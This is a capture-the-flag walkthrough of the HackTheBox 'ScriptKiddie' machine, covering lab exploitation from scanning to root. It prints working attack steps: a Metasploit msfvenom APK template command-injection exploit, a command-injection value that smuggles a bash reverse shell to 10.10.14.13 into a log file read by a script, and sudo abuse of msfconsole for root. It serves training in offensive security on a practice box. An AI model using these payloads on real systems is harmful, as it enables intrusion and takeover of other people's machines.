ScriptKiddie HackTheBox WalkThrough
This is ScriptKiddie HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted ScriptKiddie
HackTheBox
machine. Before starting let us know something about this machine. It is Linux OS
box with IP address 10.10.10.226
and difficulty easy
assigned by its maker.
First of all connect your PC with HackTheBox VPN
and make sure your connectivity with ScriptKiddie machine by pinging its IP 10.10.10.226. If all goes correct then start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it also helps in finding vulnerabilities without much effort. I have used nmap for this task and the result is given below:-
Scanning
$ sudo nmap -sC -p- -T3 -sV -oA nmap/full_scan 10.10.10.226
$ cat nmap/full_scan.nmap
Full port scan found ports 22 and 5000 as open. OpenSSH 8.2.p1
on port 22
and Werkzeug Web Server
on port 5000
are running. Enumeration on port 22 is useless until we get some known users. Also OpenSSH 8.2p1 is not affected with any well-known vulnerability which will help us in further enumeration. So leave it here and moved forward for enumeration on port 5000. Since httpd server
is running on this port so there should also be some website running on this port. The website can be accessed at URL http://10.10.10.226:5000. But before accessing the site let us check Werkzeug 0.16.1
in $searchsploit
for known vulnerability. No any vulnerability is found in this version.
Enumerating on Port 5000
Ongoing to the URL http://10.10.10.226:5000 found a dynamic website which consists of nmap
, msfvenom
and searchsploit
tools installed on it. Anyone can use this tool to scan any site, make msfvenom payload
and search for available exploits through searchsploit tool.
I simply tried to test the functionality of payloads and found that we can make payload for Linux
, Windows
and Android
using this tool of the site. It also gives us feature to upload a template file in the given format. Soon I got this file upload feature I tried to upload php
file and other format files which generally execute on web server but could not get successful this is because it allows only .exe
, .elf
and .apk
file to upload.
After some googling and a bit of research I found an exploit for Metasploit-framework 6.0.11
. According to this exploit Metasploit Framework’s msfvenom payload generator is affected with APK Template Command Injection Vulnerability
when using a crafted APK file as an Android payload template. The affected version is 6.0.11
and below in Community edition and 4.18.0
and below in Pro edition. For more info about this exploit check here and its metasploit module is present at Rapid7 repository.
Currently we don’t know the installed version of metasploit on this machine. But it is worth in giving a try. When I tried to create an apk
payload and used that payload to upload as template I could easily exploit the vulnerability and get shell. This confirms that the installed version of metasploit is less than or equal to 6.0.11. So to exploit this vulnerability and get shell follow the given steps.
1. Create msf.apk payload using module unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
. If your metasploit don’t have this module then update it first to latest version or explicitly download this module from Rapid7 repo
and add it to metasploit folder and don’t forget to update the database after addition.
Creating APK Payload
msf6 > search metasploit_msfvenom_apk_template
msf6 > use 0
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST 10.10.14.13
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LPORT 4444
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exit
$ sudo mv /root/.msf4/local/msf.apk .
2. Once you have created msf.apk
payload start netcat listener in your terminal and in browser create a payload by choosing os as android
, lhost as your tun0 IP
and choose msf.apk
file as template file.
3. At last click on generate
button to execute msf.apk file. If all goes correct you will have a shell on your netcat listener.
Getting User Shell
$ nc -nvlp 4444
~whoami && id
We have got user shell as user kid
. Let us upgrade it to fully qualified Linux shell so that we can execute more advanced Linux command through it.
Upgrading Shell
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm
$ ^Z
# CTRL + Z to background the shell
$ stty raw -echo
$ fg
# To foreground the shell
We have successfully upgraded our Linux shell. Let us capture user flag from user.txt file.
Capture User Flag
$ cat /home/kid/user.txt
Privilege Escalation
After some initial enumeration found another user pwn
in home directory and it has a file scanlosers.sh
. This file is accepting input from hackers
file located in /home/kid/logs/
directory and performing some sanitization then perform nmap
scan. If you clearly analyze the code you will find a command injection vulnerability
into this code while it accepts input from hackers file. We can exploit this vulnerability by using concatenating character ;
(Semi-colon). Since hackers file is owned by user pwn
so we will get shell as user pwn if we try to get shell by exploiting Command Injection Vulnerability.
$ cat /home/pwn/scanlosers.sh
To exploit this vulnerability and to get shell as user pwn
do the following.
$ cd /home/kid/logs/
$ ls -la
$ echo "a b ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.13/4321 0>&1' #" >> hackers
$ nc -nvlp 4321
$ whoami && id
We are pwn user now let us find our PrivEsc vector using which we can perform privilege escalation.
Finding PrivEsc Vector
$ sudo -l
command found that user pwn can run /opt/metasploit-framework-6.0.9/msfconsole
as root. When I executed $
msfconsole
as root I could easily spawn root shell from msfconsole. So here our privilege escalation vector is Privilege Escalation using Sudo Right Exploitation
.
Let us get root shell.
Getting Root Shell
$ sudo /opt/metasploit-framework-6.0.9/msfconsole
msf6 > /bin/bash -i
# whoami && id
Snippet
We are root now. Let us capture root flag from root.txt file.
Capture Root Flag
# cat /root/root.txt
This was how I rooted to ScriptKiddie HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. For any query and suggestion about the writeup feel free to write us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com/.